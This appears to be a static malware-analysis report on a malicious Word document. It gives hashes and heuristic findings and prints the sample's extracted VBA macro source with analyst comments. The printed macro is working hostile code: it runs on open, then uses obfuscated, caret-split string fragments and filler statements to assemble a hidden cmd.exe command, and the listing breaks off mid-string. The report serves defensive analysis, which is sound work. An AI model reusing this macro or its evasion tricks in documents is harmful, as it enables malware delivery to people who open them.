Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 92f3ebd2db671fd9…

MALICIOUS

Office (OLE)

80.9 KB Created: 2018-08-31 15:08:00 Authoring application: Microsoft Office Word First seen: 2018-10-07
MD5: f41b08ccf950ad4b2e52d0c9e6006c2f SHA-1: a9bce9a34e885cfc837258c941f384e01e29191a SHA-256: 92f3ebd2db671fd9743ca5401d8ce8b59ba698bd2e90b25a13a8640f30a25664
Risk score: 202

Heuristics (6)

  • ClamAV: Doc.Malware.Ddzs-6691544-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Ddzs-6691544-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    The VBA project calls Shell() from AutoOpen (see the extracted macros.bas below). The command string is assembled at run time from concatenated fragments returned by helper functions, and the window-style argument (10 - 10) evaluates to 0, i.e. the spawned process window is hidden. This is the finding that turns "macros present" into code execution on open.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    Sub AutoOpen() is defined in the ThisDocument module, so the macro body runs as soon as the document is opened with macros enabled — no user interaction beyond the macro-enable prompt is required.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, and no stronger macro-virus family marker was present. Note that this heuristic's standard wording ("no modern VBA project was recovered") does not hold for this sample: a VBA project was recovered (see OLE_VBA_MACROS and the 9,608-byte macros.bas artifact below), so this marker should be read as a redundant, lower-confidence indicator of the same AutoOpen behaviour rather than as independent evidence. It is analyst-facing evidence of Word auto-execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard DrawingML XML namespace identifier that appears in ordinary Office documents; it is not a network indicator and should not be treated as a download or C2 URL. No URL was attributed to the macro channel; in the visible macro preview the payload is carried inside the assembled cmd.exe command string rather than fetched from a URL.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9608 bytes
SHA-256: 53bfcfd1b2d2888939d96f4865eb68526f822f83478f389033ebf0f25eae5d6b
Preview script
First 1,000 lines of the extracted script
' [analyst note] VBA project attributes emitted by olevba for the first module.
' VB_Base = "1Normal.ThisDocument" identifies this as the document's ThisDocument
' module, which is where the AutoOpen entry point below lives; the module name
' (VB_Name) is a random-looking identifier, consistent with the randomised
' variable/function names used throughout the extracted code.
Attribute VB_Name = "NhhDcPmmSlWJ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
' [analyst note] Auto-execution entry point: Word runs AutoOpen when the document
' is opened with macros enabled. The "On Error Resume Next" below is split across
' line continuations (one keyword per line), which is an obfuscation / signature-
' evasion trick; its effect is that every error in this procedure is silently
' swallowed, so the filler statements never abort execution.

On _
Error _
Resume _
Next
   ' [analyst note] "Hour <expr>" statements over never-assigned variables whose
   ' result is discarded: filler/obfuscation with no functional role.
   Hour jqSjKc * raliL
   Hour OpDOD * 76984 / GiQzup / 11541
   Hour 25781 / ETYwa
' [analyst note] The actual payload launch. The command line is built at run time
' from KeyString(4+4+10+2+47) = KeyString(67) followed by nine helper functions
' (RLRMqjz and vwWisvQ are visible further down in this preview; the other seven
' are not shown here). In the Word object model 67 is the key code for "C", so
' KeyString(67) is expected to yield "c" — confirm in a controlled decode; with
' RLRMqjz's leading "md /V^:/C..." fragment this resolves to a cmd.exe invocation.
' The second argument, 10 - 10 = 0, is the Shell window style vbHide: the spawned
' process runs with no visible window.
Shell KeyString(4 + 4 + 10 + 2 + 47) + HRfHCubPYuXiaV + FqdVhWqOdMCmQm + RLRMqjz + vwWisvQ + OZPKBuF + indGw + vNOVisPLr + zrXumvLvc + tCYDvDwkPvI, 10 - 10
   ' [analyst note] More filler, same pattern as above.
   Hour aRiqro * ljFkiz * 99071 * 16827
   Hour 60794 / sirzLE
End Sub



' [analyst note] Start of the second extracted module (random-looking name); it
' holds the fragment-returning helper functions referenced from AutoOpen's Shell call.
Attribute VB_Name = "jRCvWpfn"
Function RLRMqjz()
' [analyst note] Returns one fragment of the command line that AutoOpen passes to
' Shell. Same structure as AutoOpen: continuation-split "On Error Resume Next",
' discarded "Hour" filler statements, and twelve string variables that are only
' concatenated at the end. Every string fragment is itself split into small
' concatenated pieces and peppered with caret (^) characters; ^ is the cmd.exe
' escape character and is stripped when cmd.exe parses the line, so the carets
' exist only to defeat simple substring signatures.

On _
Error _
Resume _
Next
' [analyst note] Filler (see AutoOpen).
Hour 25715 / 24185 * 69982 / zLaGGw
   Hour VCYAtz * UUrov
   Hour 11009 / RSZLR
' [analyst note] After caret removal this fragment reads: md /V:/C"set Gga=AACAgAAIAACA
' — Chr(2+2+3+0+27) is Chr(34), a double quote. Prefixed with the "c" from
' KeyString(67) in AutoOpen this is the start of a cmd.exe command: /V: enables
' delayed environment-variable expansion and /C runs the quoted command, which
' begins by assigning a long alphanumeric string to the variable Gga. How Gga is
' later decoded/executed is in the remaining fragment functions, most of which are
' outside this preview.
AbOXhPaPf = "md /V" + "^:" + "/C" + Chr(2 + 2 + 3 + 0 + 27) + "^s^" + "e^t " + "^Gg" + "^a=" + "A^A" + "CA^gAA" + "I^" + "A^AC" + "A"
Hour bvdjz / cqCsXu
   Hour Pksjwn * sjNcq * uXXfXl / 22904
   Hour 30276 / 86043 * 22506 / HVFsr
   Hour qzZLNL * nklzm / mPHUA / Jqihk
' [analyst note] Remaining pieces of the Gga value, interleaved with filler. The
' repeating "AACAgAAI" pattern at the start looks like an encoding artefact
' (e.g. base64-like) rather than plaintext — confirm by decoding the fully
' assembled command, not from this fragment alone.
mlDAfocKq = "g^AA" + "IA" + "AC^A" + "^g^A" + "A" + "^IA^"
Hour zTzRc * stOIV / kHfNDT / BbnCkb
   Hour hGCnP / KisZmu
   Hour 96637 / VGSia / 26639 * QwVicq
kfQQDmaw = "ACA" + "^g^AA" + "IA^ACA" + "^g^A^" + "AIA^AC"
Hour 28926 * rRSYIp * 81687 * 34210
   Hour 24341 * QhkNL
kYnIqzswI = "A^g^A" + "Qf^A^0H" + "A7^BA^a" + "AMGA" + "0^B" + "Q"
Hour 39911 * YziZKX / 49422 / nSlAh
   Hour KXuEsP / QDltAI
bmjSDGvow = "^Y^AMG" + "^A^" + "9^BwO^A" + "^sG" + "Ah" + "BQ^ZAI^" + "H^Ai^" + "B^wO^A^" + "o" + "^F^"
Hour 74076 / 67046 / kRujtN * 71684
   Hour ijSciG * 24845 * 54251 / LzOJo
   Hour iDbOiC * CnNWcO / jfoRXR * LjCEzN
BzJLsilYOC = "A" + "JB^Ac^A" + "^QCA^g" + "^AQb" + "^AU^G^" + "A^0B" + "QS^A^" + "0CAl" + "^Bw^" + "a^A"
Hour WdNEE / OwrSXY
   Hour Hqlbj / 68437
   Hour 71786 * wbIjDA * 69794 * TCRFZC
flKzFptHAp = "^" + "8^G^A2" + "Bg^b" + "^A" + "^k^E^A7" + "^A^Q" + "K^" + "A^oF^A^"
Hour EdmopD * ZISif * 84976 * SlvtB
   Hour 81888 / vHvPhZ
XrPjmFk = "JB^Ac" + "^AQC^A" + "gAA^" + "LA^YEA" + "h^B^wbA" + "QC" + "A^o^A^Q" + "Z^AwGA^" + "p^BgR" + "^AQGAh"
Hour 24513 / jwzWz
   Hour 58068 / FfQkBr
qjFZvEQYTD = "^B^" + "wb" + "^Aw^G^A" + "u^Bw" + "^d^A8G^" + "A" + "EB" + "g^LAY^" + "E" + "A" + "^S^B^gR" + "^" + "A^Q"
Hour 34847 * oqWmtP
   Hour 44120 / TYVBmb
   Hour WjwCj * 78335 / 36753 / DcSQN
   Hour saWnPD * iwwJw * BPChKY * GEAzH
kqrpujA = "C^A7" + "B" + "^" + "Q" + "e" + "AI^H^A" + "^0^B^" + "w^e" + "^AkCA^"
Hour 67851 * VYoaWj
   Hour 73480 / wAtZHU
YLuIfQNssX = "HBg^a^" + "Ac^H^A" + "^k" + "AA" + "I^A4^G" + "A^"
Hour OuLhj * jblTi
   Hour 2867 * OmSXoP
   Hour 36488 / ZjmKQH / XmsfRz * NiFikL
   Hour 87911 / HnjwS * 48209 * wicPP
   Hour vrofo * itvubH / 76489 * Kajoan
   Hour qSsSu * dGmVb * 90183 / tZwNj
APzCkQK = "p" + "^B^A" + "I^A^Y" + "^E^Ah^" + "Bwb^AQC" + "A^oAA^a" + "^A" + "^MG" + "^Ah" + "B^QZ" + "^AIHAv" + "Bg^" + "Z^A^sDA"
' [analyst note] The function's return value is the in-order concatenation of the
' twelve fragments above; this is the only statement in the procedure with an
' observable effect.
RLRMqjz = AbOXhPaPf + mlDAfocKq + kfQQDmaw + kYnIqzswI + bmjSDGvow + BzJLsilYOC + flKzFptHAp + XrPjmFk + qjFZvEQYTD + kqrpujA + YLuIfQNssX + APzCkQK
   Hour 36000 * CzOkt * 72095 / fkiVI
   Hour pjORdZ / wsUFD
   Hour 21165 / TKVEwH
   Hour 60602 / fXjIK / 96751 / 62664
End Function
Function vwWisvQ()

On _
Error _
Resume _
Next
Hour YIWKf / iBhvkw * 29196 * aNjEH
JshOBwkIG = "nA" + "QZ^A" + "g" + "^H^A^l^" + "B^g^" + "LAcC" + "A" + "rAwRA^"
Hour KXDOai * ifTdjs / KmNCG * ZPnUVR
   Hour vzLUDi * HRnUjv
   Hour 63065 * nzTzhp * mFQJR / DZXzpM
aQZqa = "4^EAIBA" + "^J" + "AsCAn^" + "A" + "AXAcCAr" + "A^w" + "Y^Ak^"
Hour 15845 / jhtNt
   Hour lGkKpc * 49398
   Hour 67483 / LMIZw * kzmPkk * GjZvki
sWUcMXd = "G^As" + "^B" + "^g" + "^Y^AU" + "HA" + "^wBg^OA" + "^Y^H^A" + "u^BQ" + "Z^A^" + "Q" + "C" + "^A^" + "9A^"
Hour kWivvd * pqokU
   Hour MBTidP * phqwuc * 53189 / jmOuwi
CYQMKYTAwGz = "g^W^A" + "^kEAw" + "^BAJ" + "^A^" + "sDA" + "n^A^A" + "N^" + "Ac" + "^D^Ax" + "Aw^J^A" + "ACA9^A"
Hour 83957 / CJGtt
NzvOSE = "^A^IAc" + "^EAOBA" + "^S^A" + "Q" + "C
... (truncated)